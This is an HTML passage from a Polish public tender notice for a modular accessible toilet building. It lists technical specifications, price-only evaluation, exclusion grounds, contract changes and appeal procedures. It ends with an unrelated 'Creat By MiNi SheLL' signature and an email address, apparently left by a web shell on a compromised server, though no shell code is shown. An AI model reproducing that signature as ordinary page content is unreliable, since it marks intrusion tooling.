na ścieranie,<br/>c)	izolacja: wełna mineralna, lub PIR- spełniająca normy WT 2021, <br/>6)	stolarka:<br/>a)	1 szt. okno PCV o wymiarach min. 400 mm x 600 mm, uchylne, min. Trzyszybowe - spełniająca normy WT 2021,<br/>b)	1szt. drzwi zewnętrzne stalowe pełne ocieplane - spełniająca normy WT 2021 o rozmiarze min. 100 cm x 200 cm; lewe - otwierane na zewnątrz. W zestawie: klamka, zamek, trzy komplety kluczy, zamontowane samozamykacze. Kolor do ustalenia. Tabliczka graficzna na zewnętrznych drzwiach wejściowych z informacją o toalecie dla osób niepełnosprawnych plus przewijak dla niemowląt,<br/>7)	instalacja elektryczna:<br/>a)	instalacja elektryczna jednofazowa kryta, dopuszczalna natynkowa w kanałach elektroinstalacyjnych PCV,<br/>b)	lampa LED min. 30W, sufitowa, z włącznikiem światła umiejscowionym przy zewnętrznych drzwiach wejściowych,<br/>c)	min. 3 szt. - gniazdo 230V (usytuowane w miejscach do zasilania grzejnika, podgrzewcza wody, suszarki do rąk),<br/>d)	rozdzielnica elektryczna z wyposażeniem (wyłącznik RCD, bezpieczniki B10 do oświetlenia LED <br/>i B16 do zasilania podgrzewacza wody, grzejników elektrycznych, suszarek),<br/>e)	instalacja sygnalizacji alarmowo-przyzywowej przeznaczonej dla osób niepełnosprawnych,<br/><br/>7.	Szczegółowe określenie przedmiotu zamówienia zawiera załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44211100-3 - Budynki modułowe i przenośne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-06-16</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Oceniane będą wyłącznie oferty nie odrzucone. <br/>2.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się niżej opisanymi kryteriami:<br/>Kryterium	Waga<br/>Cena brutto oferty 100% (100 pkt)<br/>3.	Przy ocenie ofert wartość wagowa wyrażona w procentach będzie wyrażona w punktach (1% = 1 pkt). Punkty w ramach kryterium oceny ofert przyznane zostaną do 2 miejsca po przecinku (na zasadzie „odcięcia” kolejnych cyfr). <br/>4.	Oferty będą oceniane wg następującego wzoru: <br/> Cn<br/>P= ––––– x 100<br/> Cb<br/>gdzie:<br/>P	- suma punktów, jakie wykonawca uzyskał w kryterium, z dokładnością do dwóch miejsc po przecinku,<br/>Cn	- najniższa cena oferty niepodlegającej odrzuceniu,<br/>Cb	- cena oferty badanej.<br/>5.	Zamawiający jako najkorzystniejszą ofertę wybierze ofertę Wykonawcy, która uzyska najwyższą liczbę punktów w ramach kryterium oceny ofert. <br/>6.	Sposób oceny ofert określony w ust. 3-5 dotyczy oceny ofert, złożonych w odpowiedzi na ogłoszenie <br/>o zamówieniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia<br/>braku podstaw wykluczenia z postępowania wykonawcy, zamawiający żąda od wykonawcy:<br/>1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz.U. z 2024 r. poz. 594), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej (dokument składany na wezwanie zamawiającego - brak wzoru do SWZ),<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, w zakresie określonym w art. 109 ust. 1 pkt 4 ustawy Pzp oraz w celu potwierdzenia, że osoba<br/>działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, sporządzone nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Wykonawca nie jest zobowiązany do złożenia tych<br/>dokumentów, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskaże<br/>dane umożliwiające dostęp do tych dokumentów.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	FORMULARZ OFERTOWY (załącznik nr 1 do SWZ),<br/>2)	oświadczenie, o niepodleganiu wykluczeniu: <br/>a)	zgodnie z art. 125 ust. 1 ustawy Pzp do oferty wykonawca dołącza oświadczenie <br/>o niepodleganiu wykluczeniu, w zakresie wskazanym przez zamawiającego. Zgodnie z art. 125 ust. 3 ustawy Pzp, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, stanowi dowód potwierdzający brak podstaw wykluczenia, na dzień składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe,<br/>b)	zgodnie z art. 125 ust. 4 ustawy Pzp, w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, składa każdy <br/>z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>Wzór oświadczenia o braku podstaw wykluczenia stanowi Załącznik nr 2 do SWZ,<br/>3)	pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania wykonawcy; treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest upoważniony, o ile ofertę składa pełnomocnik lub przedstawiciel wykonawcy.<br/>18.	W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ, do oświadczeń i dokumentów składanych przez wykonawcę w postępowaniu, zastosowanie mają przepisy rozporządzeń: Ministra Rozwoju, Pracy <br/>i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415) oraz Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. <br/>poz. 2452). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo załączone do oferty składa się zgodnie <br/>z zapisami zawartymi w Rozdziale VII SWZ i powinno zawierać w szczególności wskazanie:<br/>1)	postępowania o zamówienie publiczne, którego dotyczy,<br/>2)	wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy <br/>z podaniem adresu siedziby,<br/>3)	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>3.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy <br/>z wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 9<br/>ZMIANA UMOWY<br/>1.	Niedopuszczalne są istotne zmiany postanowień umowy, o których mowa w art. 454 ustawy Prawo zamówień publicznych.<br/>2.	Na podstawie art. 455 ust. 1 pkt 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonywania zmian postanowień niniejszej umowy, w zakresie:<br/>1)	zmiany terminu realizacji zamówienia na skutek:<br/>a)	wystąpienia działania siły wyższej (np. powódź, huragan, pożar niezawiniony przez Wykonawcę, wojna, zamieszki uliczne, stan zagrożenia epidemicznego, trzęsienie ziemi, wyładowania atmosferyczne); pod pojęciem „siły wyższej” Zamawiający rozumieć będzie zdarzenie zewnętrzne o charakterze niezależnym od Stron, którego Strony nie mogły przewidzieć przed zawarciem umowy i którego nie można uniknąć, ani któremu Strony nie mogły zapobiec przy zachowaniu należytej staranności, występujące po zawarciu umowy i powodujące niemożność wywiązania się z umowy w jej obecnym brzmieniu, <br/>b)	strona, która nie może prawidłowo wykonywać umowy wskutek działania siły wyższej jest obowiązana do bezzwłocznego poinformowania drugiej Strony o wystąpieniu działania siły wyższej w terminie 7 dni od wystąpienia tego zdarzenia, pod rygorem utraty uprawnienia do powoływania się na tę okoliczność,<br/>c)	w przypadku wystąpienia „siły wyższej” termin realizacji umowy przesuwa się o każdy dzień przestoju związanego z działaniem „siły wyższej”,<br/>2)	zmiany wynagrodzenia w przypadku zmiany stawki VAT,<br/>3)	w przypadku wystąpienia „siły wyższej” termin realizacji umowy przesuwa się o każdy dzień przestoju związanego z działaniem „siły wyższej”, <br/>4)	zmiana numeru rachunku bankowego Wykonawcy wymaga podpisania stosownego aneksu <br/>do umowy,<br/>5)	zmiany, niezależnie od ich wartości, które nie są istotne w rozumieniu art. 454 ust. 2 ustawy Pzp,<br/>6)	zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, których łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż 10% wartości pierwotnej umowy, <br/>w przypadku zamówień na usługi lub dostawy, a zmiany te nie powodują zmiany ogólnego charakteru umowy w rozumieniu art. 455 ust.1 ustawy Pzp.<br/>3.	Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego, lub przez Wykonawcę.<br/>4.	W przypadku zainicjowania zmian przez Wykonawcę, o których mowa w ust. 2 niniejszego paragrafu, Wykonawca jest zobowiązany do złożenie wniosku uzasadniającego konieczność dokonania zmian <br/>w przedmiotowej umowie.<br/>5.	Jeżeli Zamawiający uzna, że zaistniałe okoliczności nie stanowią podstawy do zmiany w umowie, Wykonawca zobowiązany jest do realizacji przedmiotu umowy zgodnie z warunkami zawartymi <br/>w niniejszej umowie.<br/>Szczegółowe informacje dotyczące zmian umowy zawiera § 9<br/>&#34;ZMIANA UMOWY &#34; do Projektowanych postanowień umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści umowy na roboty budowlane. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-09 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zakupowa https://zmk-bialystok.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-09 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Rozdział XX. Pouczenie o środkach ochrony prawnej przysługujących Wykonawcy.<br/>1.	Wykonawcy oraz innemu podmiotowi przysługują środki ochrony prawnej opisane w Dziale IX ustawy, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy. <br/>2.	Odwołanie przysługuje na:<br/>1)	niezgodną z przepisami ustawy czynność Zamawiającego, podjętą w postępowaniu o udzielenie zamówienia, w tym na Projektowane Postanowienie Umowy; <br/>2)	zaniechanie czynności w postępowaniu o udzielenie zamówienia, do której Zamawiający był obowiązany na podstawie ustawy.<br/>3.	Odwołanie wnosi się do Prezesa Izby. <br/>4.	Termin na wniesienie odwołania, określają przepisy ustawy właściwe dla zamówień, których wartość jest mniejsza niż progi unijne. <br/>5.	Zgodnie z art. 579 ust. 1 ustawy na orzeczenie Izby oraz postanowienie Prezesa Izby, o którym mowa <br/>w art. 519 ust. 1, stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sądu.<br/>6.	W postępowaniu toczącym się wskutek wniesienia skargi stosuje się odpowiednio przepisy ustawy z dnia 17 listopada 1964 r. – Kodeks postępowania cywilnego o apelacji, jeżeli przepisy Działu IX ustawy nie stanowią inaczej.<br/>7.	Skargę wnosi się do Sądu Okręgowego w Warszawie – sądu zamówień publicznych, zwanego dalej „sądem zamówień publicznych”.<br/>8.	Skargę wnosi się za pośrednictwem Prezesa Izby, w terminie 14 dni od dnia doręczenia orzeczenia Izby lub postanowienia prezesa Izby, o którym mowa w art. 519 ust. 1 ustawy. <br/>Samooczyszczenie Wykonawcy - w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5 oraz art. 109 ust. 1 pkt 4 i 5<br/>ustawy Pzp, wykonawca nie podlega wykluczeniu jeżeli udowodni zamawiającemu, że spełni łącznie następujące<br/>przesłanki:<br/>1) naprawił lub zobowiązał się do naprawienia szkody wyrządzonej przestępstwem, wykroczeniem lub swoim<br/>nieprawidłowym postępowaniem, w tym poprzez zadośćuczynienie pieniężne,<br/>2) wyczerpująco wyjaśnił fakt i okoliczności związane z przestępstwem, wykroczeniem lub swoim nieprawidłowym<br/>postępowaniem oraz spowodowanymi przez nie szkodami, aktywnie współpracując odpowiednio z właściwymi organami, w<br/>tym organami ścigania lub zamawiającym,<br/>3) podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania dalszym przestępstwem,<br/>wykroczeniem lub nieprawidłowemu postępowaniu, w szczególności:<br/>a) zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za nieprawidłowe postępowanie wykonawcy,<br/>b) zreorganizował personel,<br/>c) wdrożył system sprawozdawczości i kontroli,<br/>d) utworzył struktury audytu wewnętrznego do monitorowania, przestrzegania przepisów, wewnętrznych regulacji lub<br/>standardów,<br/>e) wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie przepisów,<br/>wewnętrznych regulacji lub standardów.<br/>1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie:<br/>art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego <br/>(t.j. Dz. U. z 2024 r. poz. 507).

Creat By MiNi SheLL
Email: jattceo@gmail.com